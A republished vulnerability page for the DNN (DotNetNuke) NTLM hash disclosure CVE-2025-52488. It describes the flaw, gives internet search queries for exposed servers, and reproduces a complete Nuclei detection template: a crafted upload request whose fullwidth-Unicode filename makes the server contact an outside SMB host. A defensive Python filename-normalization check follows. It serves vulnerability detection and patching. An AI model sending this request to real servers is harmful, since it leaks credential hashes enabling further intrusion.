DNN (DotNetNuke) Unicode Path Normalization NTLM Hash Disclosure

Vulnerability Information

Vulnerability name: DNN (DotNetNuke) Unicode Path Normalization NTLM Hash Disclosure

Vulnerability ID:

  • CVE: CVE-2025-52488

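Vulnerability type: Information disclosure

Severity: High

Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 up to but not including 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interactions to potentially expose NTLM hashes to a third-party SMB server. The issue is fixed in version 10.0.1.

Affected product: DNN is a widely used open-source web content management platform, mainly used to build and manage enterprise websites. It supports modular extensions and suits website deployments of all sizes. Because of its popularity, the vulnerability has a broad impact.

Vulnerability explanation: This is an information disclosure vulnerability. Because Unicode path normalization is handled improperly, an attacker can craft a malicious request that induces the system to leak NTLM hashes to an attacker-controlled SMB server. The root cause is improper handling of user-supplied data: input is not correctly validated and sanitized.

Impact analysis: The vulnerability lets an unauthenticated remote attacker obtain a user's NTLM hash, which may then be used in further attacks such as Pass-the-Hash. With a leaked NTLM hash, the attacker may gain access to systems, leading to data disclosure or other security risks. Exploitation can be automated and requires no user interaction, so the risk is high.

Vendor: dnnsoftware

Product: dotnetnuke

Affected versions: 6.0.0 <= version < 10.0.1

Search syntax: app="dotnetnuke" || Set-Cookie: dnn_IsMobile || icon_hash="-1465479343"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/2990fd190a278aa826a12dd66e9ca5101aad77a2/http%2Fcves%2F2025%2FCVE-2025-52488.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details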


id: CVE-2025-52488

info:
  name: DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
  author: DhiyaneshDk,iamnoooob,pdresearch
  severity: high
  description: |
    DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
  reference:
    - https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96
    - https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-52488
    cwe-id: CWE-200
    cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*
    epss-score: 0.00031
    epss-percentile: 0.07222
  metadata:
    verified: true
    max-request: 1
    vendor: dnnsoftware
    product: dotnetnuke
    shodan-query:
      - "Set-Cookie: dnn_IsMobile"
      - http.favicon.hash:-1465479343
    fofa-query:
      - app="dotnetnuke"
      - "Set-Cookie: dnn_IsMobile"
      - icon_hash="-1465479343"
  tags: cve,cve2025,file-upload,dotnetnuke,oast,oob,dnnsoftware

variables:
  payload: "%EF%BC%BC%EF%BC%BC{{interactsh-url}}%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg"

http:
  - raw:
      - |
        POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Accept-Language: en-US;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXXXXXXXXXXX

        ------WebKitFormBoundaryXXXXXXXXXXXX
        Content-Disposition: form-data; name="file"; filename="{{url_decode(replace(payload,'.','%EF%BC%8E'))}}"
        Content-Type: image/jpeg

        test
        ------WebKitFormBoundaryXXXXXXXXXXXX--

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
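
Added example, not part of the original template or of DNN's own code: a Python sketch that validates an upload file name after compatibility normalization, so the fullwidth U+FF3C and U+FF0E characters in the payload above are checked as `\` and `.` before the name reaches a file API. NFKC is an assumed model of the folding step; the function names and the host.example placeholder are hypothetical.

```python
import unicodedata
from urllib.parse import unquote

PATH_CHARS = set("\\/.:")  # ASCII characters with meaning in a Windows path


def lookalikes(name):
    """Non-ASCII characters whose NFKC form contains a path character."""
    hits = []
    for ch in name:
        folded = unicodedata.normalize("NFKC", ch)
        if ch != folded and set(folded) & PATH_CHARS:
            hits.append((f"U+{ord(ch):04X}", folded))
    return hits


def check_filename(name):
    """Validate the normalized form, i.e. what later file APIs would receive."""
    folded = unicodedata.normalize("NFKC", name)
    if folded.startswith(("\\\\", "//")):
        return "reject: UNC path after normalization", folded
    if lookalikes(name) or set(folded) & set("\\/:"):
        return "reject: path characters in file name", folded
    return "accept", folded


# Constructed samples. TEMPLATE_SHAPED is the template's payload with its OAST
# placeholder swapped for host.example, then percent-decoded like url_decode().
TEMPLATE_SHAPED = unquote(
    "%EF%BC%BC%EF%BC%BChost.example%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg"
    .replace(".", "%EF%BC%8E")
)
SAMPLES = [
    "photo.jpg",
    "\u62a5\u544a.jpg",   # legitimate CJK name, must still be accepted
    TEMPLATE_SHAPED,
    "a\uff0fb.jpg",       # fullwidth solidus folds to "/"
]

if __name__ == "__main__":
    for s in SAMPLES:
        verdict, folded = check_filename(s)
        print(f"{s!r:45} -> {verdict} ({folded!r})")
```

A check that only looks for ASCII `\` or `.` in the raw name passes the third sample, which is why the validation has to run on the normalized string.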



http://example.com/2025/07/12/github_2990657392/
Author: lianccc
Published: July 12, 2025